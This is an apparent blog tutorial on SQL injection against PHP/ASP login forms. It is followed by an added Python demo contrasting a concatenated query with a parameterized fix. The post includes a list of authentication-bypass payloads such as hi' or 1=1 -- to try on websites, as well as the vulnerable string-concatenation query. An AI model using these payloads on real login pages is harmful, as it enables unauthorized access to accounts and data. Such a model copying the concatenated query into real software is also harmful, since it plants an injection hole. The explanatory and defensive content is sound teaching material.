Database Servers Hacking
Databases are the heart of a business website. An attack on the database servers can cause a great financial loss for the company. Database servers are generally hacked to get credit card information, and just one hack on a business site will bring down its reputation and drive away customers, who want their credit card information protected. Most business websites use Microsoft SQL Server (MS SQL) and Oracle database servers. MS SQL still owns the market because its price is very low, while Oracle servers come at a high price. Some time ago Oracle claimed to be “indestructible”, but hackers took that as a challenge and showed lots of bugs in it as well. So I just want to share the knowledge with others.
Usually the user types a login name and password into the login.htm page and clicks the submit button. The values of the text boxes are passed to the login.php or logincheck.asp page, where they are checked with a SQL query. If no entry satisfies the query and the result reaches end of file, a "login failed" message is displayed. Everything seems to be OK. But wait a minute and think again. Is everything really OK? What about the query? If you have built a page like this, a hacker can simply log in successfully without knowing the password. Want to know how?
Let's look at the query again.
"Select * from table1 where login='"&log& "' and password='" &pwd& "' "
Now if a user types the login name "Jhon" and the password "h3x3r", these values are passed to the PHP or ASP page via the POST method, and the above query becomes
"Select * from table1 where login='Jhon' and password='h3x3r' "
That's fine. There will be an entry with Jhon and h3x3r in the login and password fields in the database, so we will get a "login successful" message. Now what if I type the login name "Jhon" and enter the following in the password text box?
hi' or 'a'='a
The query becomes:
"Select * from table1 where login='Jhon' and password='hi' or 'a'='a' "
Submit, and bingo! I get the message "Login successful"! Did you see how neatly the hacker got in, thanks to the web designer's lack of care?
The changed query is satisfied if the password is 'hi' or if 'a' equals 'a'. Because AND binds more tightly than OR, the whole condition is true whenever 'a'='a' is true. Clearly the password is not 'hi', but 'a'='a' always holds, so the condition is satisfied and the hacker is in with the login "Jhon"! If the above doesn't work on a given website, you can try the following in the password text box:
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
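For contrast, here is the concatenated query from this article next to a parameterized one, run against password-box inputs listed above. This is an added example, not code from the original post; it assumes Python's sqlite3 and a constructed in-memory table1 with made-up rows.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the article's table1."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE table1 (login TEXT, password TEXT)")
    # Plaintext passwords only to mirror the article's query shape.
    db.executemany("INSERT INTO table1 VALUES (?, ?)",
                   [("Jhon", "h3x3r"), ("admin", "s3cret")])
    return db

def login_concat(db, log, pwd):
    """The article's pattern: user input concatenated into the SQL text."""
    query = ("Select * from table1 where login='" + log +
             "' and password='" + pwd + "' ")
    return db.execute(query).fetchall()

def login_param(db, log, pwd):
    """Hardened form: inputs are bound as data and never parsed as SQL."""
    query = "Select * from table1 where login=? and password=?"
    return db.execute(query, (log, pwd)).fetchall()

# Password-box inputs taken from the article's list.
PAYLOADS = ["hi' or 'a'='a", "hi' or 1=1 --", "hi') or ('a'='a", 'hi" or "a"="a']

def compare(db, log, pwd):
    """Return (concatenated result or error text, parameterized result)."""
    try:
        concat = login_concat(db, log, pwd)
    except sqlite3.Error as exc:
        # Input that breaks the statement's syntax is itself a sign
        # that user data is being parsed as SQL.
        concat = "error: %s" % exc
    return concat, login_param(db, log, pwd)

if __name__ == "__main__":
    db = make_db()
    for pwd in ["h3x3r"] + PAYLOADS:
        concat, param = compare(db, "Jhon", pwd)
        # A non-empty row list means the page would report "login successful".
        print(repr(pwd), "| concatenated:", concat, "| parameterized:", param)
```

With the concatenated query, the always-true inputs return every row in the table, not just Jhon's; with bound parameters the same inputs are compared as literal password strings and match nothing.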